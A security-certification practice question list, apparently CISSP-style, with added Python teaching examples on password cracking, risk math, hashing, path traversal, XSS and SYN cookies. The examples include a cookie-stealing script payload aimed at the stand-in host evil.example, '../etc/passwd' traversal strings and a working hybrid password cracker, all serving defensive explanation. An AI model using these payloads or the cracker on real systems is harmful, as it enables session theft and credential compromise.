Q1. An attack that compromises the information stored in the client machine by web browsers for faster retrieval during subsequent visits is called what?
Q2. Which of the following are risk management processes? (This is a drag-and-drop type of question. Here, and for similar drag-and-drop questions, you can draw a line from the list of answers from the left to the empty box on the right.)
Q3. The primary criterion of business continuity planning is to ensure that its scoping is _____.
Q4. What is the algorithm used by the Wi-Fi Protected Access 2 (WPA2) protocol for encryption?
Q5. Measurements help in reducing the frequency and severity of security-related issues. Which one of the following is not a right choice for measurements?
Q6. If an attack uses a combination of brute force and dictionary entries to crack a password, then such an attack is called what?
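The attack in Q6 combines a word list with brute-forced suffixes and character substitutions. The following is an added example (not part of the original question set) that shows why a pure dictionary attack misses a mangled password while the hybrid attack recovers it; the salt, word list, hashing scheme and target password are all constructed for this illustration:

```python
import hashlib

# Constructed for this example: the target system is assumed to store
# SHA-256(salt || password). Real systems should use a slow, salted KDF.
SALT = b"example-salt"
WORDLIST = ["password", "welcome", "summer", "dragon"]


def hash_password(password: str, salt: bytes = SALT) -> str:
    """Hash a candidate the same way the (assumed) target system does."""
    return hashlib.sha256(salt + password.encode()).hexdigest()


def mangle(word: str):
    """Yield hybrid candidates: a dictionary word plus brute-forced tails and leet rules."""
    yield word
    yield word.capitalize()
    # brute-force the short numeric/symbol tail that users commonly append
    for n in range(100):
        yield f"{word}{n}"
        yield f"{word.capitalize()}{n}"
        yield f"{word.capitalize()}{n}!"
    # simple leet substitution of the whole word
    leet = word.replace("a", "@").replace("e", "3").replace("o", "0")
    yield leet
    yield leet.capitalize()


def dictionary_crack(target_hash: str, wordlist=WORDLIST, salt=SALT):
    """Pure dictionary attack: only the raw words are tried."""
    for word in wordlist:
        if hash_password(word, salt) == target_hash:
            return word
    return None


def hybrid_crack(target_hash: str, wordlist=WORDLIST, salt=SALT):
    """Hybrid attack: every dictionary word is expanded with brute-force rules.

    Returns (password, attempts) or (None, attempts).
    """
    attempts = 0
    for word in wordlist:
        for candidate in mangle(word):
            attempts += 1
            if hash_password(candidate, salt) == target_hash:
                return candidate, attempts
    return None, attempts


# Constructed target: a dictionary word with a year and symbol appended.
TARGET = hash_password("Summer23!")

if __name__ == "__main__":
    print("dictionary:", dictionary_crack(TARGET))
    print("hybrid:", hybrid_crack(TARGET))
```

The candidate space stays tiny compared with a full brute force of nine printable characters, which is the point of the hybrid approach: most of the entropy users believe they add is a predictable transformation of a common word.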
Q7. Identify from the following list an activity that best describes a management control:
Q8. Brute-forcing of passwords is a
Q9. Which of the following are steps in computer system start up and shut down procedures?
Q10. Which property of a TCP implementation is vulnerable to Denial of Service attacks?
Q11. While identifying security awareness training needs, which of the following are appropriate choices to consider?
Q12. Which one of the following types of hacker is most likely to compromise an organization's computer systems to perpetrate a computer crime for financial gain?
Q13. Which one of the following pertaining to lighting is false?
Q14. Which one of the following is a popular asymmetric key encryption algorithm that derives its key pair from the product of two large prime numbers?
Q15. An organization monitors the logon sessions of its employees. As per legal requirements and the organization's system monitoring policy, it is mandatory that employees are informed and reminded from time to time about session monitoring. Select the most appropriate method for implementing such a requirement.
Q16. Ping of death is an example of which one of the following?
Q17. In information security, the level of trust or a degree of confidence on computer systems is known as what?
Q18. Common Vulnerabilities and Exposures (CVE) contain the details of published vulnerabilities. These details are called what?
Q19. A time condition in web applications where the state of a resource changes between the time the resource is checked to when it is accessed is called what?
Q20. In public key cryptography, a message is encrypted using the recipient's public key, and the recipient's private key is used to decrypt the message. This process ensures which tenet of information security?
Q21. An attack that redirects a user accessing a legitimate website to an attacker-constructed malicious site without the acceptance or knowledge of the user is known as __________.
Q22. The process of packaging the data packets received from applications is known as encapsulation. What is the term that denotes the output of such a process?
Q23. Which one of the following statements is true?
Q24. In an organization, a surveillance monitor, such as Closed Circuit Television (CCTV), is used in critical areas to monitor the movement of personnel. Which of the following controls is least effective for such a monitoring activity?
Q25. An organization is planning to set up a data center that houses critical business application servers. Which one of the following will be the least important factor to consider for such a facility?
Q26. In cryptography, encrypting a decrypted message results in what?
Q27. Which of the following statements pertaining to the Bell-LaPadula model are appropriate?
Q28. A prominent application of the Fibre Channel Protocol includes which one of the following?
Q29. Which one of the following disaster recovery tests is also called a functional drill?
Q30. A steady interference with electrical power is called noise. What is the term used for an electrical power interference of short duration?
Q31. Malicious code that tracks user actions is called ___________.
Q32. Which one of the following water sprinkler systems is most appropriate when large volumes of water should be discharged to contain the fire?
Q34. Which of the following are true statements pertaining to information security controls?
Q35. The charge difference between neutral, hot, and ground electrical wires is called what?
Q36. Residual risk is risk that remains after _____.
Q37. In web applications, the lack of a verification mechanism to ensure that the sender of a web request actually intended to send it is exploited by which one of the following attacks?
Q38. An asset is valued at $5,000,000, and it is estimated that a certain threat has an annualized rate of occurrence (ARO) of once every three years. The asset has an exposure factor (EF) of 15%. What is the highest amount that a company should spend annually on countermeasures?
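The quantitative risk formulas behind Q38 (and the terms asked about in Q69 and Q74) are SLE = AV × EF and ALE = SLE × ARO. The following is an added worked calculation, not part of the original question set, that carries Q38's numbers through those formulas and adds the cost/benefit test a practitioner applies when comparing a specific control; exact fractions are used so the ARO of "once every three years" does not pick up floating-point noise:

```python
from fractions import Fraction


def single_loss_expectancy(asset_value, exposure_factor):
    """SLE = AV x EF: the loss expected from one occurrence of the threat."""
    return asset_value * exposure_factor


def annualized_loss_expectancy(asset_value, exposure_factor, aro):
    """ALE = SLE x ARO: the loss expected per year."""
    return single_loss_expectancy(asset_value, exposure_factor) * aro


def countermeasure_budget_ceiling(asset_value, exposure_factor, aro):
    """Highest annual spend that can still pay for itself.

    Spending more per year than the ALE the control could eliminate is
    uneconomic, so the ceiling is the ALE itself.
    """
    return annualized_loss_expectancy(asset_value, exposure_factor, aro)


def countermeasure_value(ale_before, ale_after, annual_cost):
    """Net value of a specific control: (ALE before - ALE after) - annual cost.

    A negative result means the control costs more than the risk it removes.
    """
    return (ale_before - ale_after) - annual_cost


# Q38's figures. ARO "once every three years" is 1/3 per year.
Q38 = dict(
    asset_value=5_000_000,
    exposure_factor=Fraction(15, 100),
    aro=Fraction(1, 3),
)

if __name__ == "__main__":
    sle = single_loss_expectancy(Q38["asset_value"], Q38["exposure_factor"])
    ale = annualized_loss_expectancy(**Q38)
    print(f"SLE = ${sle:,}  ALE = ${ale:,}  ceiling = ${countermeasure_budget_ceiling(**Q38):,}")
    # Hypothetical control: cuts ALE to $50,000 for $120,000/year.
    print("net value of control:", countermeasure_value(ale, 50_000, 120_000))
```

Note that the ceiling answers Q38 in isolation; when an actual control is on the table, the decision uses the residual ALE it leaves behind, not just the ALE before.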
Q39. The activities of a logged-in user are monitored and recorded in an access log file. This process is known as what?
Q40. Providing invalid or out-of-bounds inputs to the database system to obtain either database access or the database content using the native language of the database system constitutes a type of attack known as what?
Q41. Which of the following are threats to physical security?
Q42. A high wall on the physical perimeter is a physical security control. Which one of the following is a false statement about such a control?
Q43. If periodic port scanning is not performed on information systems, then there is a risk of _________ created by malicious programs.
Q44. The Business Continuity Planning life cycle includes the maintenance of plans. Which one of the following choices may not provide the necessary inputs for updating the plans pertaining to information security?
Q45. The malicious activity of changing data during the input or processing stage of a software program to obtain a financial gain is known as __________.
Q46. Hiding or showing menus in an application depending on the access permissions of a user is known as what?
Q47. Identify the false statements from the following options pertaining to information security procedures:
Q48. Which one of the following is not an assurance aim of Public Key Infrastructure (PKI)?
Q49. The process of checking and validating the effectiveness of physical security controls is called what?
Q50. Federal Information Processing Standard (FIPS) 140 Security Level 3 does not emphasize which one of the following?
Q51. A law that was developed on the basis of the decisions of courts and tribunals is called __________.
Q52. Which one of the following is a false statement pertaining to the Take-Grant model?
Q53. Providing wrong inputs to the system can be classified as which one of the following?
Q54. What is the purpose of using Secure Shell (SSH) instead of Telnet?
Q55. In cryptography, if the ciphertext corresponding to a block of plaintext chosen by the analyst is available, then which type of attack is possible?
Q56. When a sender wants to ensure that the message is not altered during transmission, the sender uses a hash function. The hash value is known as what?
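Q56 (and Q108, which asks what the computed value is called) describe the hash value used for integrity checking. The following is an added example, not part of the original question set, that shows the check working against accidental corruption and also the caveat a practitioner wants: an unkeyed hash can be recomputed by whoever altered the message, so an active attacker needs a keyed MAC or a signature to be stopped. The message, key and tampering are constructed for the illustration:

```python
import hashlib
import hmac


def message_digest(message: bytes) -> str:
    """Unkeyed hash of the message contents (the value Q56/Q108 refer to)."""
    return hashlib.sha256(message).hexdigest()


def verify_digest(message: bytes, digest: str) -> bool:
    """Recompute the digest and compare in constant time."""
    return hmac.compare_digest(message_digest(message), digest)


def mac(key: bytes, message: bytes) -> str:
    """Keyed hash (HMAC-SHA256): only holders of the key can produce it."""
    return hmac.new(key, message, hashlib.sha256).hexdigest()


def verify_mac(key: bytes, message: bytes, tag: str) -> bool:
    return hmac.compare_digest(mac(key, message), tag)


def attacker_rewrites(new_message: bytes):
    """An active attacker replaces the message and recomputes the unkeyed digest.

    Returns the forged (message, digest) pair that a plain hash check accepts.
    """
    return new_message, message_digest(new_message)


# Constructed sample traffic.
ORIGINAL = b"transfer 100 to alice"
CORRUPTED = b"transfer 1O0 to alice"      # accidental bit flip: O instead of 0
FORGED = b"transfer 9000 to mallory"      # deliberate replacement
KEY = b"constructed-shared-secret"

if __name__ == "__main__":
    d = message_digest(ORIGINAL)
    print("corruption detected by hash:", not verify_digest(CORRUPTED, d))
    forged_msg, forged_d = attacker_rewrites(FORGED)
    print("forgery passes plain hash:  ", verify_digest(forged_msg, forged_d))
    tag = mac(KEY, ORIGINAL)
    print("forgery passes HMAC:        ", verify_mac(KEY, forged_msg, tag))
```

The unkeyed digest protects against noise and bugs; it is the key (or, for non-repudiation, the signer's private key as in Q64) that protects against an adversary.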
Q57. A cryptovariable is a:
Q58. Which one of the following is not a type of sensor used in wave pattern motion detectors?
Q59. An organization has identified risks to its web servers from hacking attacks through the Internet. Which one of the following may not be a correct strategy to mitigate the risks?
Q60. Which of the following is false for Gas discharge fire extinguishing systems?
Q61. While doing risk assessment for physical and environmental security requirements, which of the following security professionals should be taken into consideration?
Q62. Which of the following statements is false pertaining to the RC4 algorithm?
Q63. Which of the following are risk mitigation strategies?
Q64. In digital signature, the process of signing is accomplished by what?
Q65. At what temperature is the valve of a wet pipe sprinkler system designed to open?
Q66. Which one of the following is not a primary objective of the Orange book?
Q67. IEEE 802.11 is a set of standards for which of the following networking technologies?
Q68. Identify the least appropriate method from the following to determine the strength or security of a cryptographic key:
Q69. Which one of the following choices is correct for Annualized Loss Expectancy (ALE)?
Q70. Which one of the following is false pertaining to gray-box penetration testing?
Q71. The address space of IPv6 is what?
Q72. Identify the correct statements pertaining to the primary purpose of cryptography:
Q73. A cold boot attack is used to retrieve information such as password or encryption keys from DRAM memories even after the power is removed. Which property of the DRAM memories is this attack trying to compromise?
Q74. An exposure factor can be best described as:
Q75. While developing business continuity plans, which one of the following should be considered as the most important requirement?
Q76. Replay attacks are due to improper handling of:
Q77. Sending Unsolicited Commercial Email (UCE) is popularly known as:
Q78. Identify the correct asset classification criteria from the following:
Q79. The turnstile type of fencing should be considered in which of the following situations?
Q80. For the proper operation of computer parts, the ideal humidity range should be 40 to 60%. What type of problem will occur if the humidity is above 60%?
Q81. Threats exploit vulnerabilities through:
Q82. Identify the intellectual property-related terms from the following:
Q83. A strong session management prevents what type of attack?
Q84. Identify the incorrect statements pertaining to security policy:
Q85. Which of the following is not true of a Kerberos implementation?
Q86. Basic Input Output System (BIOS) checks can be used to control access to the system using password protection. This control is called what?
Q87. Which of the following information security models proposes a directed graph?
Q88. When a malicious code that came disguised inside a trusted program gets activated on a particular event or date, then such malicious code is called what?
Q89. An access card that contains integrated circuits and can process information for physical and logical access control is called what?
Q90. Which one of the following is a correct description of a preventative control?
Q91. Which of the following are right considerations while designing a data center?
Q92. An access control model that uses a pair of values that are related to the least upper bound and the greatest lower bound in a model is called what?
Q93. Secret and hidden channels that transmit information to unauthorized entities based on the response time of the system are known as what?
Q94. Secure Sockets Layer (SSL) is a popular protocol that uses cryptographic encryption to protect the communication data. Which type of cipher does this protocol use for such a protection?
Q95. Which one of the following statements pertaining to combustible materials is false?
Q96. The focus of the Red Book in the Rainbow Series published by the US Department of Defense (DoD) is ___________.
Q97. Which one of the following pertaining to fire-suppression mediums is false?
Q98. Which one of the following methods is most suitable for protecting copyrighted information?
Q99. Which of the following information security models is also known as a State machine model?
Q100. The systematic use of information to identify sources and estimate risk is known as what?
Q101. When you want to ensure that the message you sent can be opened only by the receiver, then you will do what?
Q102. Portable fire extinguishers predominantly use which fire-suppression medium?
Q103. Which of the following choices can be appropriate when an organization needs to resume its critical IT operations in 24 to 48 hours?
Q104. The amount of time or effort required to accomplish an attack is known as what?
Q105. The layer that manages the communication between two computers in the OSI model is called what?
Q106. Fooling an information system to make it trust an entity that has imitated the trusted entity is known as what?
Q107. Which one of the following controls will be most effective to prevent data theft due to data remanence in the storage media?
Q108. Hash value in cryptography is a computed value based on the contents of the message. What is this computed value called?
Q109. If an access to an asset is determined by its owner, then such an access control is termed as what?
Q110. Which one of the following is a service asset?
Q111. Which one of the following is false pertaining to the information owners?
Q112. An organization is doing risk assessment for the Information Technology department. Which one of the following choices would not yield much input for the assessment?
Q113. Which one of the following protocols is most likely to reduce the manual configuration of IP addresses for host computers?
Q114. IPsec is a set of protocols used to secure Internet communications. Which of the following is not a key function of the protocol?
Q115. Randomization vulnerabilities are predominantly concerned with which one of the following?
Q116. Providing a personal identification number (PIN) along with a smart card and swiping a finger constitutes what type of authentication?
Q117. In cryptography, when a key is authorized for use by legitimate entities for a period of time, what is that period called?
Q118. Which one of the following is not true pertaining to Virtual Private Networking (VPN)?
Q119. In the Bell-LaPadula model, which one of the following statements is false?
Q120. Which one of the following is false pertaining to the TCP/IP protocols?
Q121. The concept of least privilege is applicable to what?
Q122. The Border Gateway Protocol (BGP) works in which layer of the TCP/IP model?
Q123. In Public Key Infrastructure, which of the following is not a key management procedure?
Q124. Asymmetric key encryption is also known as what?
Q125. An armed response to an intrusion is called what?
Q126. An organization is planning to conduct information security awareness training programs for its employees. Which one of the following topics should they consider the most important?
Q127. At what stage of penetration testing are vulnerability scanners used?
Q128. The practice of discovering the full content of a DNS zone via successive queries is called what?
Q129. The separation of users and data is an example of which type of assurance?
Q130. In computer crime, the role of computers could be which one of the following?
Q131. Which one of the following is not true for Recovery Time Objectives (RTO) pertaining to Business Continuity Planning?
Q132. The goals of the (ISC)² code of ethics include which one of the following?
Q133. Which one of the following is a crime committed by way of identity theft?
Q134. Which one of the following attacks does not represent a form of social engineering?
Q135. Key loggers capture the keystrokes of an unsuspecting user. Which one of the following attacks represents the equivalent behavior of capturing activity information on the network?
Q136. Which one of the following statements pertaining to criminal law is not correct?
Q137. ___________ is a set of exclusive rights granted to the inventor of a new, useful, inventive, and industrially applicable invention.
Q138. Sarbanes-Oxley mandates a number of reforms to which one of the following?
Q139. Which one of the following statements pertaining to communication protocols is false?
Q140. The four upper layers in the OSI model are sometimes referred to as_______.
Q141. Spoofing can also be referred to as:
Q142. Which of the following is not a service provided by Domain Name System Security Extensions (DNSSEC)?
Q143. Which one of the following statements pertaining to Dynamic Host Configuration Protocol (DHCP) is false?
Q144. Path traversal is a type of attack that tries to:
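Q144 concerns path traversal: input such as `../` (possibly URL-encoded) that walks a file request out of the directory the application intended to serve. The following is an added example, not part of the original question set, showing the vulnerable join beside the hardened resolver; the document root and request paths are constructed for the illustration, and `posixpath` is used so the behaviour is the same on every OS:

```python
import posixpath
from urllib.parse import unquote

BASE_DIR = "/srv/app/public"  # assumed document root for this example


def resolve_vulnerable(user_path: str) -> str:
    """Decode the request and join it under the root with no containment check.

    '../' segments walk out of BASE_DIR, and an absolute path makes
    posixpath.join discard BASE_DIR entirely.
    """
    return posixpath.join(BASE_DIR, unquote(user_path))


def resolve_safe(user_path: str):
    """Return the resolved path if it stays inside BASE_DIR, else None."""
    decoded = unquote(user_path)          # decode once; do not decode repeatedly
    if "\x00" in decoded:                 # NUL would truncate the path in C file APIs
        return None
    # Treat the request as relative to the root, then collapse '.' and '..'.
    candidate = posixpath.normpath(posixpath.join(BASE_DIR, decoded.lstrip("/")))
    # Compare against BASE_DIR + "/" so a sibling like /srv/app/public-old is rejected.
    if candidate != BASE_DIR and not candidate.startswith(BASE_DIR + "/"):
        return None
    return candidate


# Constructed request paths.
BENIGN = "images/logo.png"
TRAVERSAL = "../../../etc/passwd"
ENCODED = "..%2F..%2F..%2Fetc%2Fpasswd"
ABSOLUTE = "/etc/passwd"

if __name__ == "__main__":
    for p in (BENIGN, TRAVERSAL, ENCODED, ABSOLUTE):
        print(f"{p!r:32} vulnerable -> {posixpath.normpath(resolve_vulnerable(p))}")
        print(f"{'':32} safe       -> {resolve_safe(p)}")
```

In a real deployment the check should run on the real path (`os.path.realpath`) as well, so that a symbolic link inside the document root cannot point outside it; the lexical check above is the first line of defence, not the only one.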
Q145. Which of the following cryptographic standards uses three 56-bit keys?
Q146. Secure Electronic Transaction (SET) is a:
Q147. What is the normal height range of a raised floor in a data center?
Q148. A periodic mock test rehearsing the steps to be taken during an emergency is also known as what?
Q149. Full disk encryption is used to encrypt the data in laptops. This is done to prevent which type of attack?
Q150. Average time required to repair a device is termed as what?
Q151. A technique to hide information from unauthorized entities is known as what?
Q152. A property states that a subject at a given security level may not write to any object at a lower security level. Which security model states this property?
Q153. In biometrics, the identity claimed by a person is verified by a process called a one-to-one search. This process can be described as what?
Q154. An authority who manages the certificates in a Public Key Infrastructure is known as what?
Q155. Which of the following algorithms are not useful for hashing?
Q156. Kerberos is suitable for preventing what?
Q157. The disposal phase in system development life cycle is concerned with which one of the following?
Q158. In the software development life cycle, verification during development and implementation is a process used to check what?
Q159. What is the biggest concern in using a waterfall model for software development?
Q160. Which of the following are core security considerations for secure software development processes?
Q161. From the security perspective, which of the following procedures is most important during software development processes?
Q162. Failure to properly create, store, transmit, or protect passwords is an example of what?
Q163. Failure of a web application to validate, filter, or encode user input before returning it to another user's web client is known as what?
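Q163 describes cross-site scripting: user input returned to another user's browser without encoding. The following is an added example, not part of the original question set, that renders the same constructed payload through a vulnerable template and through one that encodes for the HTML context; it also covers the attribute context, where the quote character is what needs encoding:

```python
import html


def render_vulnerable(name: str) -> str:
    """Reflects the input straight into the page body."""
    return f"<p>Hello, {name}!</p>"


def render_safe(name: str) -> str:
    """Encodes <, >, &, and quotes so the browser treats the input as text."""
    return f"<p>Hello, {html.escape(name, quote=True)}!</p>"


def link_vulnerable(title: str) -> str:
    """Reflects the input into an attribute value."""
    return f'<a title="{title}" href="/">home</a>'


def link_safe(title: str) -> str:
    """quote=True matters here: an unescaped quote ends the attribute."""
    return f'<a title="{html.escape(title, quote=True)}" href="/">home</a>'


# Constructed payloads.
BODY_PAYLOAD = '<script>document.location="https://evil.example/?c="+document.cookie</script>'
ATTR_PAYLOAD = '" onmouseover="alert(document.cookie)'

if __name__ == "__main__":
    print(render_vulnerable(BODY_PAYLOAD))
    print(render_safe(BODY_PAYLOAD))
    print(link_vulnerable(ATTR_PAYLOAD))
    print(link_safe(ATTR_PAYLOAD))
```

Encoding is context-specific: the HTML-body encoding above is not sufficient for input placed inside a JavaScript block, a URL, or a CSS value, each of which needs its own encoder.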
Q164. Mobile code is executed in which one of the following?
Q165. Which of the following are common data structure attacks?
Q166. The encryption of data between the client and the server in an Internet web browsing session can be accomplished using what?
Q167. Which one of the following is not a technical control?
Q168. An organization's security initiatives based on policies, procedures, and guidelines; security awareness training; and risk management together define what?
Q169. Which of the following parameters are considered for assets during asset classification and help in devising suitable controls for security protection?
Q170. Which one of the following classifications of information, if compromised, could cause damage to national security as per governmental classification types?
Q171. While initiating a business continuity planning process, which of the following is first established?
Q172. Business continuity plans should identify which one of the following?
Q173. A call tree in Business Continuity Planning represents which one of the following?
Q174. Which of the following are important for Business Continuity Processes?
Q175. Half-open connections are a vulnerability in what?
Q176. SYN cookies are:
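Q175 and Q176 (with Q10) are about the same problem: a server that allocates state for every half-open connection can be exhausted by a SYN flood, and SYN cookies avoid that by encoding what the server needs to remember into the initial sequence number of its SYN-ACK. The following is an added example, not part of the original question set, implementing a simplified Bernstein-style cookie: a 5-bit time counter, a 3-bit encoded MSS, and a 24-bit keyed hash over the connection 4-tuple and counter. The secret, MSS table, addresses and timestamps are all constructed for the illustration:

```python
import hashlib
import hmac
import struct

SECRET = b"constructed-server-secret"   # assumed per-boot server secret
MSS_TABLE = [536, 1300, 1440, 1460]     # assumed MSS encoding (3 bits available)
TIME_SLOT = 64                          # seconds per counter tick (5-bit counter)


def _keyed_hash24(saddr: bytes, sport: int, daddr: bytes, dport: int, t: int) -> int:
    """24-bit keyed hash of the 4-tuple and time counter; forgers lack SECRET."""
    msg = struct.pack("!4sH4sHB", saddr, sport, daddr, dport, t)
    return int.from_bytes(hmac.new(SECRET, msg, hashlib.sha256).digest()[:3], "big")


def make_syn_cookie(saddr, sport, daddr, dport, client_isn: int, mss: int, now: int) -> int:
    """Server ISN for the SYN-ACK. Nothing about this connection is stored."""
    t = (now // TIME_SLOT) & 0x1F
    mss_idx = 0
    for i, m in enumerate(MSS_TABLE):       # largest table entry <= client's MSS
        if m <= mss:
            mss_idx = i
    low24 = (_keyed_hash24(saddr, sport, daddr, dport, t) + client_isn) & 0xFFFFFF
    return (t << 27) | (mss_idx << 24) | low24


def check_syn_cookie(saddr, sport, daddr, dport, client_isn: int, ack: int, now: int):
    """Validate the final ACK of the handshake.

    client_isn is the client's own ISN (its seq in the ACK minus one).
    Returns the MSS the cookie encoded, or None if the ACK is forged or stale.
    """
    cookie = (ack - 1) & 0xFFFFFFFF         # the ACK acknowledges our ISN + 1
    t = cookie >> 27
    mss_idx = (cookie >> 24) & 0x7
    low24 = cookie & 0xFFFFFF
    now_t = (now // TIME_SLOT) & 0x1F
    if (now_t - t) & 0x1F > 1:              # accept the current and previous tick only
        return None
    expected = (_keyed_hash24(saddr, sport, daddr, dport, t) + client_isn) & 0xFFFFFF
    if low24 != expected or mss_idx >= len(MSS_TABLE):
        return None
    return MSS_TABLE[mss_idx]


# Constructed handshake.
CLIENT, SERVER = bytes([10, 0, 0, 1]), bytes([192, 0, 2, 10])

if __name__ == "__main__":
    isn = make_syn_cookie(CLIENT, 40000, SERVER, 443, client_isn=123456, mss=1460, now=1000)
    print("cookie ISN:", hex(isn))
    print("valid ACK  ->", check_syn_cookie(CLIENT, 40000, SERVER, 443, 123456, isn + 1, now=1000))
    print("forged ACK ->", check_syn_cookie(CLIENT, 40000, SERVER, 443, 123457, isn + 1, now=1000))
    print("stale ACK  ->", check_syn_cookie(CLIENT, 40000, SERVER, 443, 123456, isn + 1, now=1300))
```

The trade-off this makes visible: the server keeps no half-open state, so a flood costs it only CPU for the hash, but TCP options other than the MSS are lost because there is nowhere in 32 bits to keep them, which is why real stacks enable cookies only once the SYN backlog is full.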
Q177. In client server networking, cookies are:
Q178. The process of sending an ECHO_REQUEST using the Internet Control Message Protocol (ICMP) is popularly known as what?